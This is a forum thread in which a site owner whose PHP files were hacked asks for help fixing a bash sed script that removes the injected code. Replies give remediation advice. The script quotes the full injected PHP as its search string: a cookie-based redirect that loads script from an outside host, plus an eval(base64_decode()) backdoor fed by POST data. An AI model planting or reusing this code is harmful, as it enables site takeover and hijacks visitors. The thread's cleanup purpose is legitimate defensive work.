Hi all,

I had my website hacked and thousands of files have a malicious script added inside PHP files.

I have tried to remove the code using a script I located online but it fails.

I think the problem is due to use of special characters in the string I am searching for.

Here it is, if you could help me make it work I would be very grateful.


# ************************************************** ***************************************
# find_and_replace_in_files.sh
# This script does a recursive, case sensitive directory search and replace of files
# To make a case insensitive search replace, use the -i switch in the grep call
# uses a startdirectory parameter so that you can run it outside of specified directory - else this script will modify itself!
# ************************************************** ***************************************
!/bin/bash
# **************** Change Variables Here ************
startdirectory="/path/to/public_html/"
searchterm="global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }"
replaceterm=""
# ************************************************** ********

echo "******************************************"
echo "* Search and Replace in Files Version .1 *"
echo "******************************************"

for file in $(grep -l -R $searchterm $startdirectory)
do
sed -e "s/$searchterm/$replaceterm/ig" $file > /tmp/tempfile.tmp
mv /tmp/tempfile.tmp $file
echo "Modified: " $file
done

echo " *** Yay! All Done! *** "



Many thanks,
sean

I'm sorry to hear that.


I hope you took measures to prevent that from happening again. Plugging holes should start by finding out how the culprit came in (stolen FTP credentials, SSH brute forcing lame password) or how the abuse else could have happened (lackadaisical access permissions, vulnerable software versions) and could mean installing the newest version of any shopping cart, web log, statistics, web site, forum or plugin or other software in your web stack you use, and removing versions (and installation files) of software that is no longer maintained by its developers. (And if your "thousands of files" are the result of self-coded work then consider using a tool that is safe to use instead.) If you have not done any of the above then I suggest you do that before thinkng about trying to revert back changes. If holes are left unplugged chances are those malicious changes will be back before you can say " *** Yay! All Done! *** ".


While we can't have members post malicious code here but I wouldn't mind you passing it on to me via email. But code excerpt only please. If you manage to blithely send me a complete web page with like 1 line of malicious script code you simply won't get any reply back.

Hi,

The problem was with an old piece of gallery software I no longer use. It has since been removed.

The code is shown in my original post although that is not the only part of the attack. I had some tmp_xxxx.php files created and modifications to .htaccess.

The problem has been plugged, I just need to clean my .php files now.

Thanks,
Seabro

Good, good.


No, I meant the code that latched itself onto your PHP files. Although the "for" loop part could use some work as there's no need for temp files or replacement string and a "while" loop works better if there's any spaces in file names:

I just encountered Seabro's issue and manage to find this thread. Unspawn or Seabro, could you pls share the code that can wipe it off? Damn turnitupnow..

hey indyloft,

sorry to hear of your problem.

Its been a while since this happened to me but I believe I ended up using 'sed'

Check it out, it can run through a load of files and modify the contents. I used it simple to remove the unwanted code. They is probably another way which is much better but 'sed' worked for me.

Good luck.

seabro